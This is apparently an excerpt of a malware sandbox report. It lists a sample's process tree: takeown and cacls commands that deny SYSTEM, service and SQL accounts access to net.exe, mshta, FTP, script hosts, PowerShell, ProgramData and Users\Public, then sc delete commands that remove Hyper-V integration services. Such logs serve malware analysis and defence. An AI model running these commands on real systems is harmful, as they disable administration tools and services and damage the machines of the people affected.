C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net1.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net1.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\mshta.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵
-
